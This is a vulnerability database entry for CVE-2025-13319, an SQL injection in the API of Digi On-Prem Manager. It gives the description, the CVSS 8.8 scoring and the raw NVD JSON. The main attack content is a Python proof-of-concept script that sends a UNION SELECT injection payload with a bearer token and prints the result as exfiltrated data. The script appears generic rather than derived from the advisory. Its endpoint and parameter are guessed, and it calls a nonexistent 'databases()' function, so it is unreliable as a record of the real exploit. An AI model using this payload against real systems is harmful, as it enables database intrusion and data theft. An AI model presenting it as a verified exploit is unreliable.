Security Vulnerability Report
中文
CVE-2025-13319 CVSS 8.8 HIGH

CVE-2025-13319

Published: 2025-11-17 17:15:49
Last Modified: 2026-04-15 00:35:42
Source: e8a6bb0b-e373-42b1-a5de-93e314325576

Description

An injection vulnerability has been discovered in the API feature in Digi On-Prem Manager, enabling an attacker with valid API tokens to inject SQL via crafted input. The API is not enabled by default, and a valid API token is required to perform the attack.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Digi On-Prem Manager 所有未修复版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-13319 PoC - SQL Injection in Digi On-Prem Manager API # Target: Digi On-Prem Manager with API enabled # Requirement: Valid API token TARGET_URL = "https://target-server/api/v1/" API_TOKEN = "your-valid-api-token-here" def exploit_sql_injection(): headers = { "Authorization": f"Bearer {API_TOKEN}", "Content-Type": "application/json" } # SQL Injection payload - extract database version # Modify the 'query' parameter with malicious SQL payload = { "query": "1' UNION SELECT version(),user(),databases() -- " } try: response = requests.post( f"{TARGET_URL}search", headers=headers, json=payload, verify=False, timeout=30 ) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") if response.status_code == 200: # Try to extract sensitive data data = response.json() print(f"Exfiltrated Data: {json.dumps(data, indent=2)}") return True except requests.exceptions.RequestException as e: print(f"Request failed: {e}") return False if __name__ == "__main__": print("CVE-2025-13319 - Digi On-Prem Manager API SQL Injection") print("=" * 60) exploit_sql_injection()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13319", "sourceIdentifier": "e8a6bb0b-e373-42b1-a5de-93e314325576", "published": "2025-11-17T17:15:48.550", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An injection vulnerability has been discovered in the API feature in Digi On-Prem Manager, enabling an attacker with valid API tokens to inject SQL via crafted input.\n\nThe API is not enabled by default, and a valid API token is required to perform the attack."}], "metrics": {"cvssMetricV31": [{"source": "e8a6bb0b-e373-42b1-a5de-93e314325576", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "e8a6bb0b-e373-42b1-a5de-93e314325576", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://dom.nettec.no/security-advisories/DOM-25-001/", "source": "e8a6bb0b-e373-42b1-a5de-93e314325576"}]}}